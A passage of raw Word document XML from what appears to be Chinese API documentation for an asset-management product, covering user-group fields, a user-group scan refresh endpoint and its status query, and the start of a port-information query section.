      <w:tr w:rsidR="00BC669E" w14:paraId="2510A9E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E281315" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3270CEB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB72FC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AB035E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="281527BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B5225D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6981BBE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31123724" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22DA344D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E34549D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EA27F96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B0575FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B8C0BE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36B08D95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A324064" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="289EC974" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA32661" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04043CC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="319C09D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="700F8034" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04DD1A84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="314EF9CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD1B14B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="308B6E34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组id（仅支持</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A26C311" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DB63764" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>members</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7277AB67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73F77178" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name ：varchar(128) type：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76C90DE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>组成员，仅windows name: 用户名 type: 用户类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F20C8F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C16118E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55AC5F22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50CA806E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03ADD714" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组描述，仅windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67C9CBF8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc115166101"/>
      <w:bookmarkStart w:id="54" w:name="用户组信息扫描"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="43A2E40D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求系统账号信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B13A355" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6DE134" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61653BE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B775EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303374EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411905DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78027C05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CC760" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C597596" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00A873" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>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374B1D05"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33D8510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7A5091B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715B24CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="509FBE10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B4B53BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="25C4A298" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CA94B71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BFF5FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="404C8669" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52CD3705" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="039E6AA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc115166102"/>
      <w:bookmarkStart w:id="56" w:name="用户组信息查询扫描状态"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="6F6E3C71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询系统用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311A898" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc115166103"/>
      <w:bookmarkStart w:id="58" w:name="端口信息"/>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r>
        <w:t>端口信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="077DBEA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询系统端口，将按每台主机每个端口展示；每条数据均包含主机信息，您可以灵活的使用该接口组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0750F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B95D08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的端口信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5732E554" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694B73C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>端口信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22464BF8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD3465" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FF596" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED4EBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F27AEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62E73C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>端口信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304DBC6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3142239F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用端口信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D60EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065C5FF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9F726" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc115166104"/>
      <w:bookmarkStart w:id="60" w:name="端口信息查询结果"/>
      <w:r>
        <w:t>端口信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="64EB28AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询端口信息，按每台主机每个端口进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C842D58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC6128" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/port/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB833B7"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519"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2110"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5466152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1A4DACE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6AFD41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F82A086" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2154FC77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
